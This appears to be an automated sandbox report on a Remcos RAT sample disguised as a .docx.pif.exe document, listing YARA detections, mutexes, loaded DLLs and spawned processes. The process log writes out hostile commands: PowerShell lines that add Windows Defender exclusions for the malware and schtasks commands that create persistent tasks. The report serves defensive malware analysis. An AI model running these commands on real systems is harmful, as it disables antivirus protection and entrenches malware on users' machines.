                Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: TkdxROLUOVpK.exe PID: 2892, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: vbc.exe PID: 5456, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: TkdxROLUOVpK.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, YL2q2YAVtmpvhXuwY3.csSecurity API names: _0020.SetAccessControl
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, YL2q2YAVtmpvhXuwY3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, YL2q2YAVtmpvhXuwY3.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, YL2q2YAVtmpvhXuwY3.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, YL2q2YAVtmpvhXuwY3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, YL2q2YAVtmpvhXuwY3.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, PenYE0tkOYCLDqwRMy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, YL2q2YAVtmpvhXuwY3.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, YL2q2YAVtmpvhXuwY3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, YL2q2YAVtmpvhXuwY3.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, PenYE0tkOYCLDqwRMy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, YL2q2YAVtmpvhXuwY3.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, YL2q2YAVtmpvhXuwY3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, YL2q2YAVtmpvhXuwY3.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, PenYE0tkOYCLDqwRMy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, PenYE0tkOYCLDqwRMy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@21/16@51/0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,15_2_00417952
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,15_2_0040F474
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,15_2_0041B4A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,15_2_0041AA4A
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeFile created: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-5MRRQ3
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4832:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeMutant created: \Sessions\1\BaseNamedObjects\GZHBuduAufzLXXIAj
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeFile created: C:\Users\user\AppData\Local\Temp\tmpBE91.tmpJump to behavior
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exeReversingLabs: Detection: 65%
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exeVirustotal: Detection: 60%
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeFile read: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe"
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpCDF3.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe"Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe"Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpCDF3.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
